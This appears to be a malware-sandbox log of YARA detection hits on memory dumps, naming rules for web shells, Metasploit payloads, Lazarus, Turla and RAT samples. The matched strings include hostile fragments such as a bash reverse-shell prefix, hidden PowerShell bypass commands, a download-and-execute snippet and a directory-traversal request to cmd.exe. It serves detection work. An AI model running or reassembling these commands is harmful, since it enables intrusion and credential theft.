00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x439:$s0: Safe0ver
0000000A.00000003.312103557.0000000006629000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x2199e:$s2: Auditcleaner 0x1fece:$elf12: envoytomato 0x1ff2e:$elf14: estopmoonlit
00000013.00000002.541755283.0000000002FA0000.00000004.00000040.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x7b0:$f: PPWDUMP_DATA
00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x12e80:$php: <? 0x15668:$php: <? 0x16959:$php: <? 0x18dd8:$php: <? 0x18dde:$payload3: eval(gzuncompress(base64_decode(
00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp	webshell_php_h6ss	Web Shell - file h6ss.php	Florian Roth	0x18dd8:$s0: <?php eval(gzuncompress(base64_decode("
00000013.00000003.477128932.00000000052EB000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x1f5e:$s2: Auditcleaner 0x36a6:$s11: elatedmonkey 0x3716:$elf4: charm_saver 0x276e:$elf12: envoytomato 0x273e:$elf14: estopmoonlit 0x38d7:$elf17: ghost_sparc 0x31c6:$elf19: orleans_stride 0x2ec6:$elf21: seconddate 0x3716:$pe2: charm_saver 0x38e3:$pe3: ghost_x86
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Volgmer_Malware	Detects Volgmer malware as reported in US CERT TA17-318B	Florian Roth	0x1bfc2:$x1: User-Agent: Mozillar/5.0 0x1c002:$x3: [TestConnect To Bot] - Port = %d 0x1c027:$x4: b50a338264226b6d57c1936d9db140ba74a28930270a083353645a9b518661f4fcea160d7 0x1c08a:$s2: H_%s_%016I64X_%04d%02d%02d%02d%02d%02d.TXT 0x1c0d5:$s4: %s\dllcache\%s.dll 0x1c0ec:$s5: Cond Fail. 0x1c0fb:$s6: The %s %s%s 0x1c10b:$s7: %s "%s"%s "%s" %s "%s" 0x1c126:$s8: DLL_Spider.dll
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x17e2c:$: \\.\pipe\%s%s%d 0x17e3e:$: %s\pipe\%s%s%d%s 0x17e51:$: \ADMIN$\System32\%s%s
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	ProcessInjector_Gen	Detects a process injection utility that can be used ofr good and bad purposes	Florian Roth	0x9fd0:$x1: Error injecting remote thread in process: 0x9ffe:$s5: [-] Error getting access to process: %ld! 0xa02c:$s6: --process-name <name> Process name to inject 0xa05f:$s12: No injection target has been provided! 0xa08b:$s17: [-] An app path is required when not injecting!
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Lazagne_PW_Dumper	Detects Lazagne PW Dumper	Markus Neis / Florian Roth	0xc510:$s1: Crypto.Hash 0xc520:$s2: laZagne 0xc52c:$s3: impacket.winregistry
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	SUSP_shellpop_Bash	Detects susupicious bash command	Tobias Michalski	0x5e91:$: /bin/bash -i >& /dev/tcp/
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	GoldDragon_Aux_File	Detects export from Gold Dragon - February 2018	Florian Roth	0x145ff:$x1: /////////////////////regkeyenum//////////// 0x148ac:$x1: /////////////////////regkeyenum////////////
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	VBS_dropper_script_Dec17_1	Detects a supicious VBS script that drops an executable	Florian Roth	0x17c7d:$s1: TVpTAQEAAAAEAA 0x17c90:$s2: TVoAAAAAAAAAAA 0x17ca3:$s3: TVqAAAEAAAAEAB 0x17cb6:$s4: TVpQAAIAAAAEAA 0x17cc9:$s5: TVqQAAMAAAAEAA 0x1b3c6:$s5: TVqQAAMAAAAEAA 0x1d783:$s5: TVqQAAMAAAAEAA 0x17cdc:$a1: = CreateObject("Wscript.Shell")
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Lazarus_Dec_17_5	Detects Lazarus malware from incident in Dec 2017	Florian Roth	0x19484:$x1: $ProID = Start-Process powershell.exe -PassThru -WindowStyle Hidden -ArgumentList 0x194da:$x2: $respTxt = HttpRequestFunc_doprocess -szURI $szFullURL -szMethod $szMethod -contentData $contentData; 0x19544:$x3: [String]$PS_PATH = "C:\\Users\\Public\\Documents\\ProxyAutoUpdate.ps1"; 0x19590:$x4: $cmdSchedule = 'schtasks /create /tn "ProxyServerUpdater" 0x195ce:$x5: /tr "powershell.exe -ep bypass -windowstyle hidden -file 0x1960c:$x6: C:\\Users\\Public\\Documents\\tmp' + -join 0x1963c:$x7: $cmdResult = cmd.exe /c $cmdInst \| Out-String; 0x1966f:$x8: whoami /groups \| findstr /c:"S-1-5-32-544"
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	APT_Turla_Agent_BTZ_Gen_1	Detects Turla Agent.BTZ	Florian Roth	0x3a9a:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0xa82c:$x1: 1dM3uu4j7Fw4sjnbcwlDqet4F7JyuUi4m5Imnxl1pzxI6as80cbLnmz54cs5Ldn4ri3do5L6gs923HL34x2f5cvd0fk6c1a0s 0x3b00:$s1: release mutex - %u (%u)(%u) 0x3b20:$s2: \system32\win.com 0xa9af:$s2: \system32\win.com 0x3b36:$s3: Command Id:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0x3b6c:$s4: MakeFile Error(%d) copy file to temp file %s 0x3b9d:$s5: %s%%s08x.tmp 0x3bae:$s6: Run instruction: %d ID:%u%010u(%02d:%02d:%02d %02d/%02d/%04d) 0x3bf0:$s7: Mutex_Log 0x3bfe:$s8: %s\system32\winview.ocx 0x3c49:$s10: Error: pos(%d) > CmdSize(%d) 0x3c6b:$s11: \win.com 0x3c79:$s12: Error(%d) run %s 0x3c90:$s13: %02d.%02d.%04d Log begin: 0xa991:$s13: %02d.%02d.%04d Log begin:
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Suspicious_BAT_Strings	Detects a string also used in Netwire RAT auxilliary	Florian Roth	0x16dc6:$s1: ping 192.0.2.2 -n 1
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Turla_Mal_Script_Jan18_1	Detects Turla malicious script	Florian Roth	0x16fe1:$s1: .charCodeAt(i % 0x16ff6:$s2: {WScript.Quit();} 0x1700c:$s3: .charAt(i)) << 10) \| 0x17025:$s4: = WScript.Arguments;var 0x17043:$s5: = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";var i;
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	VBS_Obfuscated_Mal_Feb18_1	Detects malicious obfuscated VBS observed in February 2018	Florian Roth	0x121c2:$x1: A( Array( (1* 2^1 )+ 0x121db:$x2: .addcode(A( Array( 0x121f2:$x3: false:AA.send:Execute(AA.responsetext):end 0x12221:$x4: & A( Array( (1* 2^1 )+ 0x1223d:$s1: .SYSTEMTYPE:NEXT:IF (UCASE( 0x1225d:$s2: A = STR:next:end function 0x1227b:$s3: &WSCRIPT.SCRIPTFULLNAME&CHR
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	LokiBot_Dropper_ScanCopyPDF_Feb18	Auto-generated rule - file Scan Copy.pdf.com	Florian Roth	0x116b5:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x118a1:$a1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB 0x11708:$s2: Unstalled2
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	PowerShell_Susp_Parameter_Combo	Detects PowerShell invocation with suspicious parameters	Florian Roth	0x1a763:$sa1: -enc 0x1a7a0:$sb2: -window hidden 0x194b3:$sb3: -WindowStyle Hidden 0x195ec:$sb3: -windowstyle hidden 0x5bcc:$sc1: -nop 0x5bd1:$se1: -ep bypass 0x195e1:$se1: -ep bypass 0x1a756:$se2: -exec bypass 0x1a793:$se2: -exec bypass 0x13c36:$se3: -ExecutionPolicy Bypass 0x1a756:$se4: -exec bypass 0x1a793:$se4: -exec bypass
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Armitage_msfconsole	Detects Armitage component	Florian Roth	0x18b30:$s1: \umeterpreter\u > 0x18b46:$s3: ^meterpreter > 0x18b5a:$s11: \umsf\u>
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Armitage_OSX	Detects Armitage component	Florian Roth	0x18c7a:$x1: resources/covertvpn-injector.exe 0x18ca0:$s10: resources/browserpivot.x64.dll 0x18cc4:$s17: resources/msfrpcd_new.bat
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Silence_malware_2	Detects malware sample mentioned in the Silence report on Securelist	Florian Roth	0x1dc3a:$x1: \ScreenMonitorService\Release\smmsrv.pdb 0x1dc67:$x2: \\.\pipe\{73F7975A-A4A2-4AB6-9121-AECAE68AABBB} 0x1dc9b:$s1: My Sample Service: ServiceMain: SetServiceStatus returned error 0x1dcdf:$s2: \mss.exe 0x1dcec:$s3: \out.dat 0x1dcf9:$s4: \mss.txt 0x1dd06:$s5: Default monitor
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Invoke_Mimikatz	Detects Invoke-Mimikatz String	Florian Roth	0x1d798:$x3: Write-BytesToMemory -Bytes $Shellcode1 -MemoryAddress $GetCommandLineWAddrTemp
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1752c:$s1: stratum+tcp:// 0x1753f:$s2: "normalHashing": true,
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	MAL_unspecified_Jan18_1	Detects unspecified malware sample	Florian Roth	0x16d71:$s1: User-Agent: Mozilla/4.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x16dc6:$s2: ping 192.0.2.2 -n 1 -w %d >nul 2>&1 0x16dee:$s3: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x16e20:$s4: start /b "" cmd /c del "%%~f0"&exit /b 0x16e4b:$s5: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0x16e74:$s6: %s\%s.bat 0x16e82:$s7: DEL /s "%s" >nul 2>&1
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	Invoke_PSImage	Detects a command to execute PowerShell from String	Florian Roth	0x197f2:$: IEX([System.Text.Encoding]::ASCII.GetString( 0x19821:$: System.Drawing.Bitmap((a Net.WebClient).OpenRead( 0x19855:$: 89 50 4E 47 0D 0A 1A 0A 00 00 00 0D 49 48 44 52 00 00 04 E4 00 00 03 A0 08 06 00 00 00 9D AF A9 ...
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	malware_apt15_royaldll	DLL implant, originally rights.dll and runs as a service	David Cannings	0xd88f:$: Nwsapagent 0xd87a:$: "%s">>"%s"\s.txt 0xd83a:$: del c:\windows\temp\r.exe /f /q
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	JoeSecurity_WebMonitor	Yara detected WebMonitor RAT	Joe Security
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	JoeSecurity_ComRAT_XORKey	Yara detected Turla ComRAT XORKey	Joe Security
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp	netwire	detect netwire in memory	JPCERT/CC Incident Response Group	0x16dc6:$ping: ping 192.0.2.2 0x16dee:$log: [Log Started] - [%.2d/%.2d/%d %.2d:%.2d:%.2d]
0000000A.00000002.536292107.0000000002E75000.00000004.00000040.sdmp	scanarator	Auto-generated rule on file scanarator.exe	yarGen Yara Rule Generator by Florian Roth	0x9f78:$s4: GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp	Empire_Invoke_Shellcode	Empire - a pure PowerShell post-exploitation agent - file Invoke-Shellcode.ps1	Florian Roth	0x308:$s2: "Injecting shellcode injecting into $((Get-Process -Id $ProcessId).ProcessName) ($ProcessId)!" ) )
0000000A.00000003.312201086.0000000006654000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x48b:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x52768:$f: PPWDUMP_DATA
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp	webshell_jsp_cmdjsp	Web Shell - file cmdjsp.jsp	Florian Roth	0xd88:$s5: <FORM METHOD=GET ACTION='cmdjsp.jsp'>
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp	webshell_sig_404super	Web shells - generated from file 404super.php	Florian Roth	0xc08:$s4: $i = pack('c*', 0x70, 0x61, 99, 107);
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp	webshell_webshells_new_Asp	Web shells - generated from file Asp.asp	Florian Roth	0xdc8:$s1: Execute MorfiCoder(")//z//(tseuqer lave")
0000000A.00000003.315807326.000000000684B000.00000004.00000001.sdmp	shankar_php_php	Semi-Auto-generated - file shankar.php.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x9926:$sAuthor: ShAnKaR
00000013.00000003.470556930.0000000006B92000.00000004.00000001.sdmp	Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php	Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x1db:$s1: Liz0ziM Private Safe Mode Command Execuriton Bypass
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x179d0:$a: Amplia Security
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp	webshell_r57shell127_r57_iFX_r57_kartal_r57_antichat	Web Shell - from files r57shell127.php, r57_iFX.php, r57_kartal.php, r57.php, antichat.php	Florian Roth	0x17bf8:$s8: if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } 0x17d38:$s9: foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
0000000A.00000003.308279629.00000000050AA000.00000004.00000001.sdmp	Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php	Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt	Neo23x0 Yara BRG + customization by Stefan -dfate- Molls	0x17e79:$s0: Safe0ver
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp	FVEY_ShadowBroker_Auct_Dez16_Strings	String from the ShodowBroker Files Screenshots - Dec 2016	Florian Roth	0x6c99e:$s2: Auditcleaner 0x48a7e:$s11: elatedmonkey 0x48656:$elf4: charm_saver 0x48f76:$elf8: ebbshave 0x48d96:$elf9: eggbasket 0x6aece:$elf12: envoytomato 0x6af2e:$elf14: estopmoonlit 0x48a47:$elf17: ghost_sparc 0x48eae:$elf18: jackpop 0x4abae:$elf19: orleans_stride 0x4a76e:$elf21: seconddate 0x48656:$pe2: charm_saver 0x48a53:$pe3: ghost_x86
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp	webshell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	Web Shell - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0x49e90:$s1: <option value="cat /etc/passwd">/etc/passwd</option>
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp	webshell_webshells_new_PHP1	Web shells - generated from file PHP1.php	Florian Roth	0x4a430:$s3: @preg_replace("/f/e",$_GET['u'],"fengjiao");
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp	h4ntu_shell__powered_by_tsoi_	Semi-Auto-generated - file h4ntu shell [powered by tsoi	unknown	0x4a249:$s0: h4ntu shell
0000000A.00000003.304349540.00000000065DE000.00000004.00000001.sdmp	WebShell_Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit	PHP Webshells Github Archive - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php	Florian Roth	0x49e90:$s13: <option value="cat /etc/passwd">/etc/passwd</option>
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf	Metasploit Payloads - file msf.sh	Florian Roth	0x3c35e:$s1: export buf=\
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_2	Metasploit Payloads - file msf.asp	Florian Roth	0x3c497:$s1: & "\" & "svchost.exe" 0x3fd9:$s2: CreateObject("Wscript.Shell") 0x3c4b1:$s2: CreateObject("Wscript.Shell") 0x3d727:$s2: CreateObject("Wscript.Shell") 0x3df7f:$s2: CreateObject("Wscript.Shell") 0x3c4d3:$s3: <% @language="VBScript" %>
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_psh	Metasploit Payloads - file msf-psh.vba	Florian Roth	0x3f66:$s1: powershell.exe -nop -w hidden -e 0x3c620:$s1: powershell.exe -nop -w hidden -e 0x3cb19:$s1: powershell.exe -nop -w hidden -e 0x3c645:$s2: Call Shell( 0x3c655:$s3: Sub Workbook_Open()
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_exe	Metasploit Payloads - file msf-exe.vba	Florian Roth	0x3cdc7:$s1: '* PAYLOAD DATA 0x3cddb:$s2: = Shell( 0x3cde9:$s3: = Environ("USERPROFILE") 0x3ce06:$s4: '************************************************************** 0x3ce4a:$s5: ChDir ( 0x3ce56:$s6: '* MACRO CODE
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_3	Metasploit Payloads - file msf.psh	Florian Roth	0x3cf90:$s1: [DllImport("kernel32.dll")] public static extern int WaitForSingleObject( 0x3cfde:$s2: public enum MemoryProtection { ExecuteReadWrite = 0x40 } 0x3d01b:$s3: .func]::VirtualAlloc(0, 0x3d037:$s4: .func+AllocationType]::Reserve -bOr [ 0x3d061:$s5: New-Object System.CodeDom.Compiler.CompilerParameters 0x3d09b:$s6: ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location)) 0x3d0ec:$s7: public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 } 0x3d131:$s8: .func]::CreateThread(0,0,$ 0x3d150:$s9: public enum Time : uint { Infinite = 0xFFFFFFFF } 0x3d187:$s10: = [System.Convert]::FromBase64String("/ 0x3d1b4:$s11: { $global:result = 3; return }
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_4	Metasploit Payloads - file msf.aspx	Florian Roth	0x3d300:$s1: = VirtualAlloc(IntPtr.Zero,(UIntPtr) 0x3d329:$s2: .Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE); 0x3d35a:$s3: [System.Runtime.InteropServices.DllImport("kernel32")] 0x3d395:$s4: private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40; 0x3d3d4:$s5: private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_exe_2	Metasploit Payloads - file msf-exe.aspx	Florian Roth	0x3d57d:$x1: = new System.Diagnostics.Process(); 0x3d5a5:$x2: .StartInfo.UseShellExecute = true; 0x3d5cc:$x3: , "svchost.exe"); 0x3d5e2:$s4: = Path.GetTempPath();
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_6	Metasploit Payloads - file msf.vbs	Florian Roth	0x3fd7:$s1: = CreateObject("Wscript.Shell") 0x3d725:$s1: = CreateObject("Wscript.Shell") 0x3df7d:$s1: = CreateObject("Wscript.Shell") 0x3ac56:$s2: = CreateObject("Scripting.FileSystemObject") 0x3d749:$s2: = CreateObject("Scripting.FileSystemObject") 0x3df4c:$s2: = CreateObject("Scripting.FileSystemObject") 0x3d77a:$s3: .GetSpecialFolder(2) 0x3d793:$s4: .Write Chr(CLng(" 0x3d7a9:$s5: = "4d5a90000300000004000000ffff00 0x3d7cf:$s6: For i = 1 to Len( 0x3d7e5:$s7: ) Step 2
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_7	Metasploit Payloads - file msf.vba	Florian Roth	0x3c93f:$s1: Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal 0x3c987:$s2: = VirtualAlloc(0, UBound(Tsw), &H1000, &H40) 0x3c9b8:$s3: = RtlMoveMemory(
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_8	Metasploit Payloads - file msf.ps1	Florian Roth	0x3cf90:$s1: [DllImport("kernel32.dll")] 0x3d91a:$s1: [DllImport("kernel32.dll")] 0x3d93a:$s2: [DllImport("msvcrt.dll")] 0x3d958:$s3: -Name "Win32" -namespace Win32Functions -passthru 0x3d98e:$s4: ::VirtualAlloc(0,[Math]::Max($ 0x3d9b1:$s5: .Length,0x1000),0x3000,0x40) 0x3d9d2:$s6: public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 0x3da46:$s7: ::memset([IntPtr]($
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_cmd	Metasploit Payloads - file msf-cmd.ps1	Florian Roth	0x3cafb:$x1: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_9	Metasploit Payloads - file msf.war - contents	Florian Roth	0x3db9c:$s1: if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) 0x3dbea:$s2: .concat(".exe"); 0x3dbff:$s3: [0] = "chmod"; 0x3dc12:$s4: = Runtime.getRuntime().exec( 0x3dc33:$s5: , 16) & 0xff;
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_11	Metasploit Payloads - file msf.hta	Florian Roth	0x3df00:$s1: .ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") Then 0x3ac56:$s2: = CreateObject("Scripting.FileSystemObject") 0x3d749:$s2: = CreateObject("Scripting.FileSystemObject") 0x3df4c:$s2: = CreateObject("Scripting.FileSystemObject") 0x3df7d:$s3: = CreateObject("Wscript.Shell")
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Msfpayloads_msf_ref	Metasploit Payloads - file msf-ref.ps1	Florian Roth	0x3e0d0:$s1: kernel32.dll WaitForSingleObject), 0x3e0f7:$s2: = ([AppDomain]::CurrentDomain.GetAssemblies() \| Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\') 0x3e16e:$s3: GetMethod('GetProcAddress').Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object 0x3e1d4:$s4: .DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', 0x94e:$s5: = [System.Convert]::FromBase64String( 0x3d187:$s5: = [System.Convert]::FromBase64String( 0x3e217:$s5: = [System.Convert]::FromBase64String( 0x3e241:$s6: [Parameter(Position = 0, Mandatory = $True)] [Type[]] 0x3e27b:$s7: DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard,
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0xab63:$s1: WS2_32.dll 0x9420:$s2: ReflectiveLoader 0x9489:$s2: ReflectiveLoader 0x98a1:$s2: ReflectiveLoader 0x991d:$s2: ReflectiveLoader 0xd8b3:$s2: ReflectiveLoader 0xd903:$s2: ReflectiveLoader 0xe373:$s2: ReflectiveLoader 0xe874:$s2: ReflectiveLoader 0xeb82:$s2: ReflectiveLoader
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	CVE_2017_8759_SOAP_Excel	Detects malicious files related to CVE-2017-8759	Florian Roth	0x5bdb:$s1: \|'soap:wsdl=
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	PowerShell_ISESteroids_Obfuscation	Detects PowerShell ISESteroids obfuscation	Florian Roth	0x15898:$x1: /\/===\__ 0x158a6:$x2: ${__/\/== 0x158b4:$x3: Catch { } 0x158c2:$x4: \_/=} ${_
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_1	Detects Reflective DLL Loader	Florian Roth	0x93d2:$x1: \Release\reflective_dll.pdb 0x93f2:$x2: reflective_dll.x64.dll 0x940d:$s3: DLL Injection 0x941f:$s4: ?ReflectiveLoader@@YA_KPEAX@Z 0x9488:$s4: ?ReflectiveLoader@@YA_KPEAX@Z
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_2	Detects Reflective DLL Loader - suspicious - Possible FP could be program crack	Florian Roth	0x9853:$x1: \ReflectiveDLLInjection-master\ 0x9877:$s2: reflective_dll.dll 0x9adb:$s2: reflective_dll.dll 0x9b1c:$s2: reflective_dll.dll 0x988e:$s3: DLL injection 0x98a0:$s4: _ReflectiveLoader@4 0x991c:$s4: _ReflectiveLoader@4 0xeb81:$s4: _ReflectiveLoader@4 0x98b8:$s5: Reflective Dll Injection
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Reflective_DLL_Loader_Aug17_3	Detects Reflective DLL Loader	Florian Roth	0x9a88:$s1: \Release\inject.pdb 0x9aa0:$s2: !!! Failed to gather information on system processes! 0x9877:$s3: reflective_dll.dll 0x9adb:$s3: reflective_dll.dll 0x9b1c:$s3: reflective_dll.dll 0x9af2:$s4: [-] %s. Error=%d 0x9b07:$s5: \Start Menu\Programs\reflective_dll.dll
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	VBScript_Favicon_File	VBScript cloaked as Favicon file used in Leviathan incident	Florian Roth	0x3e1:$x1: myxml = '<?xml version=""1.0"" encoding=""UTF-8""?>';myxml = myxml +'<root> 0x431:$x2: .Run "taskkill /im mshta.exe 0x452:$x3: <script language="VBScript">Window.ReSizeTo 0, 0 : Window.moveTo -2000,-2000 : 0x4a5:$s1: .ExpandEnvironmentStrings("%ALLUSERSPROFILE%") & 0x4da:$s2: .ExpandEnvironmentStrings("%temp%") &
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Backdoor_Redosdru_Jun17	Detects malware Redosdru - file systemHome.exe	Florian Roth	0x181dc:$x1: %s\%d.gho 0x114ac:$x2: %s\nt%s.dll 0x181ea:$x2: %s\nt%s.dll 0x181fa:$x3: baijinUPdate 0x114bc:$s1: RegQueryValueEx(Svchost\netsvcs) 0x1820b:$s1: RegQueryValueEx(Svchost\netsvcs) 0x18230:$s2: serviceone 0x1823f:$s3: \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#p \x1F#f \x1F# 0x182aa:$s4: servicetwo 0x182b9:$s5: UpdateCrc 0x182c7:$s6: \x1F#[ \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F#x \x1F# 0x18322:$s7: nwsaPAgEnT 0x18331:$s8: %-24s %-15s 0x%x(%d)
00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp	Backdoor_Nitol_Jun17	Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader	Florian Roth	0x1114a:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x184be:$x1: User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01) 0x1119a:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x1850e:$x2: User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1) 0x18557:$x3: TCPConnectFloodThread.target = %s 0x1857d:$s1: \Program Files\Internet Explorer\iexplore.exe 0x185af:$s2: %c%c%c%c%c%c.exe 0x185c4:$s3: GET %s%s HTTP/1.1 0x185da:$s4: CCAttack.target = %s 0x11325:$s5: Accept-Language: zh-cn 0x185f3:$s5: Accept-Language: zh-cn 0x1860e:$s6: jdfwkey 